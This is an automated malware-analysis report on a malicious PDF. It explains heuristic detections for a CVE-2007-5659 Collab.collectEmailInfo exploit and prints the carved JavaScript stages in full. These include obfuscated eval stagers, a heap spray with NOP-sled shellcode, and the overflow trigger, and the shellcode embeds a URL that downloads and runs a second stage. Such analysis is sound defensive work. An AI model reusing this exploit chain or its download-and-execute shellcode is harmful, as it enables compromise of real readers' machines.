Malware Insights
The PDF file contains embedded JavaScript within its annotations. Heuristics indicate the use of String.fromCharCode and a specific PDF annotation staging primitive ('syncAnnotScan') to decode and execute JavaScript. The extracted JavaScript files, particularly 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js', are likely responsible for downloading and executing a second-stage payload, as suggested by the presence of obfuscated code and script obfuscation indicators. The exact nature of the payload cannot be determined without further analysis of the executed scripts.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low; 4 related findings; PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high; CVE likely; PDF_JS_ADOBE_APSB08_13_PATCH_GATE): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  Matched line in script:
  var pdaoXx_3 = new Array();var mOW2_OPCx4__Cv = 0;var YYOoMPNJ2c = "";function c_k_3_bw4R3_u(Nc8YP_b, j_Cv_b113Kii){var b_1n_8_eb = j_Cv_b113Kii.toString();var SH8H_u = "";for(var uVQ_VT4G_3 = 0; uVQ_VT4G_3 < b_1n_8_eb.length; uVQ_VT4G_3++) {var AvE301_Mb2 = parseInt(b_1n_8_eb.substr(uVQ_VT4G_3, 1));if (!isNaN(AvE301_Mb2)) {AvE301_Mb2 = AvE301_Mb2.toString(16);if (AvE301_Mb2.length == 1) { AvE301_Mb2 = "0" + AvE301_Mb2; }else if (AvE301_Mb2.length != 2) { AvE301_Mb2 = "00"; }SH8H_u = AvE301_Mb2 …
- PDF JavaScript exploit cluster (critical; PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); }
- PDF exploit shellcode contains an embedded download URL (high; PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- syncAnnotScan annotation-staging primitive (low; PDF_FOXIT_SYNCANNOTSCAN): PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
- Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://storesigma.com/cgi-bin/ids.html/n002106201r0409Xc29c4422Y195dec80 (Referenced by PDF JavaScript)
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1814 bytes |

SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10";
function decrypt(str, jump){
    var result = "";
    var list = str.split(',');
    for (var i=0; i < list.length; i++) {
        result += String.fromCharCode(list[i] - jump);
    }
    return result;
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| numeric_charcode_stage_000.js | deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 469 bytes |

SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
    var num = 1;
    pr = app.doc.getAnnots(
        {
            nPage: 0
        }
    );
    sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
    fnc += 'a';
    var arr = sum.split(/-/);
    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x"+arr[i]);
    }
    fnc += 'l';
}
if (app.plugIns.length >= 2)
{
    app[fnc]/**/(buf);
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1BE0 | 12068 bytes |

SHA-256: 1a46f845e4e4e9ecc265d236d3d2e36e1541c67f0caff85f43126d436794c6fc
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
function ew__3_M74p(O010__A, yb86a_h){var fgh = "va";var bc = String [ "fro" + 'mCha' + "rCode"];var b4OT_x_6N8_8 = arguments [ 'c' + "alle" + 'e' ];var tG6xa_0u_8h4_Tc = 0;try {var qt_7_lAD3i0m = 0;if (app) {tG6xa_0u_8h4_Tc++;yb86a_h = pr[qt_7_lAD3i0m].subject;}tG6xa_0u_8h4_Tc++;} catch(e) { }var HV6_7_a_w_H_vV = new Array();if (O010__A) { HV6_7_a_w_H_vV = O010__A;} else {var Obj80LIn_HL = 0;var Yl1RR_o6Ex = 0;var u8n_86u13_U = 512;var f33546f3jt_04 = 53;b4OT_x_6N8_8 = b4OT_x_6N8_8.toString();f33546f3jt_04 = f33546f3jt_04 - 5;var Q_65aG336_vops = f33546f3jt_04 + 10;Q_65aG336_vops = Q_65aG336_vops - 1;while(Yl1RR_o6Ex < b4OT_x_6N8_8.length) {var CpU_10ngN = 1;var Ah47LgPu106_ydg = b4OT_x_6N8_8["charCo" + "deAt"](Yl1RR_o6Ex);if (Ah47LgPu106_ydg >= f33546f3jt_04 && Ah47LgPu106_ydg <= Q_65aG336_vops) {if (Obj80LIn_HL == 4) {Obj80LIn_HL = 0;}if (isNaN(HV6_7_a_w_H_vV[Obj80LIn_HL])) {var qt_7_lAD3i0m = 0;HV6_7_a_w_H_vV[Obj80LIn_HL] = qt_7_lAD3i0m;}HV6_7_a_w_H_vV[Obj80LIn_HL] += Ah47LgPu106_ydg;if (HV6_7_a_w_H_vV[Obj80LIn_HL] > u8n_86u13_U) {HV6_7_a_w_H_vV[Obj80LIn_HL] -= 512;}Obj80LIn_HL++;}Yl1RR_o6Ex++;}}Obj80LIn_HL = 4;for (var b_mSA__V_d = 0; b_mSA__V_d < 4; b_mSA__V_d++) {if (HV6_7_a_w_H_vV[b_mSA__V_d] > 256) {HV6_7_a_w_H_vV[b_mSA__V_d] -= 256;}}var o_D_OG3kn_70 = 0;var b34Og_PRv5Bk__4 = "";var j33m___v = 0;var h_I___W_Dt5_f = 0;var G_5_0_3050 = 0;var SwawSg_Dvr;var nKc7at0 = 23;while(h_I___W_Dt5_f < yb86a_h.length) {var Y__5k_w = yb86a_h.substr(h_I___W_Dt5_f, 1) + "YY";var r4LHQCKLTok1 = parseInt(Y__5k_w, nKc7at0);if (j33m___v) {SwawSg_Dvr += r4LHQCKLTok1;if (o_D_OG3kn_70 == 4) {o_D_OG3kn_70 -= 4;}var KBGUk2vq__3 = SwawSg_Dvr;KBGUk2vq__3 = KBGUk2vq__3 - (G_5_0_3050 + 2) * HV6_7_a_w_H_vV[o_D_OG3kn_70];if (KBGUk2vq__3 < 0) {KBGUk2vq__3 = KBGUk2vq__3 - Math.floor(KBGUk2vq__3 / 256) * 256;}KBGUk2vq__3 = String.fromCharCode(KBGUk2vq__3);if (tG6xa_0u_8h4_Tc == 2) {b34Og_PRv5Bk__4 += KBGUk2vq__3;} else if (tG6xa_0u_8h4_Tc == 1) {b34Og_PRv5Bk__4 += r4LHQCKLTok1;} else 
{b34Og_PRv5Bk__4 += h_I___W_Dt5_f;}o_D_OG3kn_70++;G_5_0_3050++;j33m___v = 0;} else {SwawSg_Dvr = r4LHQCKLTok1 * 23;j33m___v = 1;}h_I___W_Dt5_f++;}var ac = this;ac["e"+fgh + 'l'](b34Og_PRv5Bk__4);}
ew__3_M74p(0, "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");

| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_001.js | deobfuscated-js | nested inline base-23 callee-key decoded JavaScript at offset 0x1BE0 | 4923 bytes |

SHA-256: 7ae600049a9e23bcd4fd364b3d7c2e847c990abd7c9456f175ac2f58c42c5b97
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
var pdaoXx_3 = new Array();var mOW2_OPCx4__Cv = 0;var YYOoMPNJ2c = "";function c_k_3_bw4R3_u(Nc8YP_b, j_Cv_b113Kii){var b_1n_8_eb = j_Cv_b113Kii.toString();var SH8H_u = "";for(var uVQ_VT4G_3 = 0; uVQ_VT4G_3 < b_1n_8_eb.length; uVQ_VT4G_3++) {var AvE301_Mb2 = parseInt(b_1n_8_eb.substr(uVQ_VT4G_3, 1));if (!isNaN(AvE301_Mb2)) {AvE301_Mb2 = AvE301_Mb2.toString(16);if (AvE301_Mb2.length == 1) { AvE301_Mb2 = "0" + AvE301_Mb2; }else if (AvE301_Mb2.length != 2) { AvE301_Mb2 = "00"; }SH8H_u = AvE301_Mb2 + SH8H_u;}}while(SH8H_u.length < 8) { SH8H_u = "0" + SH8H_u; }var d_6P_bur = Nc8YP_b.toString(16);if (d_6P_bur.length == 1) { d_6P_bur = "0" + d_6P_bur; }else if (d_6P_bur.length != 2) { d_6P_bur = "00"; }SH8H_u = "3" + d_6P_bur + "P" + SH8H_u;return SH8H_u;}function hfT_hc8f8g(HsUNtPg, K4_Os_e_y){var IBF__48wp5_s_Fk = new Array("");var O7__0f = HsUNtPg;var lAnB6bA850282ep;if ((lAnB6bA850282ep = HsUNtPg.lastIndexOf("%u00")) != -1) {if (lAnB6bA850282ep + 6 == HsUNtPg.length) {IBF__48wp5_s_Fk[0] = HsUNtPg.substr(lAnB6bA850282ep + 4, 2);O7__0f = HsUNtPg.substring(0, lAnB6bA850282ep);}}lAnB6bA850282ep = 1;for (uVQ_VT4G_3 = 0; uVQ_VT4G_3 < K4_Os_e_y.length; uVQ_VT4G_3++) {var b__8V6pI6 = K4_Os_e_y.charCodeAt(uVQ_VT4G_3).toString(16);if (b__8V6pI6.length == 1) { b__8V6pI6 = "0" + b__8V6pI6; }IBF__48wp5_s_Fk[lAnB6bA850282ep] = b__8V6pI6;lAnB6bA850282ep++;}uVQ_VT4G_3 = IBF__48wp5_s_Fk[0].length ? 
0 : 1;IBF__48wp5_s_Fk[lAnB6bA850282ep] = "00";IBF__48wp5_s_Fk[lAnB6bA850282ep + 1] = "00";lAnB6bA850282ep += 2;if ((IBF__48wp5_s_Fk.length - uVQ_VT4G_3) % 2) {IBF__48wp5_s_Fk[lAnB6bA850282ep] = "00";}while(uVQ_VT4G_3 < IBF__48wp5_s_Fk.length) {O7__0f += "%u" + IBF__48wp5_s_Fk[uVQ_VT4G_3 + 1] + IBF__48wp5_s_Fk[uVQ_VT4G_3];uVQ_VT4G_3 += 2;}O7__0f += "%u0000";return O7__0f;}function Y_2y5u__31515(Bq72255P, lG_5ba){while (Bq72255P.length*2<lG_5ba) {Bq72255P += Bq72255P;}Bq72255P = Bq72255P.substring(0,lG_5ba/2);return Bq72255P;}function i_Q__e7_R_ML(Qm_v31Q_4J, Nao3CRQlb, R_15_2n_e_X){var L28H_t = 0x0c0c0c0c;var Bq72255P = unescape(Nao3CRQlb);var K4_Os_e_y = c_k_3_bw4R3_u(Qm_v31Q_4J, R_15_2n_e_X);var Ga_36I6Yh2_D = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var HsUNtPg = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7270%u5371%u0052%u7468%u7074%u2f3a%u732f%u6f74%u6572%u6973%u6d67%u2e61%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6469%u2e73%u7468%u6c
6d%u6e2f%u3030%u3132%u3630%u3032%u7231%u3430%u3930%u6358%u3932%u3463%u3234%u5932%u3931%u6435%u6365%u3038";app.rw46oE1 = unescape(hfT_hc8f8g(HsUNtPg, K4_Os_e_y));var hu7G4T3_KFB1nxI = 0x400000;var Py_pmn = Ga_36I6Yh2_D.length * 2;var lG_5ba = hu7G4T3_KFB1nxI - (Py_pmn+0x38);Bq72255P = Y_2y5u__31515(Bq72255P, lG_5ba);var g_h_Pc_f8Pi0 = (L28H_t - 0x400000)/hu7G4T3_KFB1nxI;for (var pCnE_J_T0u_A = 0; pCnE_J_T0u_A < g_h_Pc_f8Pi0; pCnE_J_T0u_A++) {pdaoXx_3[pCnE_J_T0u_A] = Bq72255P + Ga_36I6Yh2_D;}}function k020Xj_r5_P7h(){var c4GytAJf53 = "";for (uVQ_VT4G_3 = 0; uVQ_VT4G_3 < 12; uVQ_VT4G_3++) {c4GytAJf53 += unescape("%u0c0c%u0c0c");}var R_og6_1G2U0 = "";for (uVQ_VT4G_3 = 0; uVQ_VT4G_3 < 750; uVQ_VT4G_3++) {R_og6_1G2U0 += c4GytAJf53;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: R_og6_1G2U0});app.clearTimeOut(mOW2_OPCx4__Cv);}function VL_y08L_6gA5q(Ie8WCO___0Lg1WG){var k0_nRY = mOW2_OPCx4__Cv;if ((Ie8WCO___0Lg1WG >= 8 && Ie8WCO___0Lg1WG < 8.11) || Ie8WCO___0Lg1WG < 7.1) {i_Q__e7_R_ML(23, "%u0c0c%u0c0c", Ie8WCO___0Lg1WG);k020Xj_r5_P7h();}if (k0_nRY) {app.clearTimeOut(k0_nRY);}}var R_15_2n_e_X = 0;var UF1cvmoLvv = app.plugIns;for (var g_R3Vo_DX_C = 0; g_R3Vo_DX_C < UF1cvmoLvv.length; g_R3Vo_DX_C++) {var ERDV7T = UF1cvmoLvv[g_R3Vo_DX_C].version;if (ERDV7T > R_15_2n_e_X) { R_15_2n_e_X = ERDV7T; }}if (app.viewerVersion == 9.103 && R_15_2n_e_X < 9.13) {R_15_2n_e_X = 9.13;}app.D5___TC_Sd0L_4F = VL_y08L_6gA5q;mOW2_OPCx4__Cv = app.setTimeOut("app.D5___TC_Sd0L_4F(" + R_15_2n_e_X.toString() + ")", 50);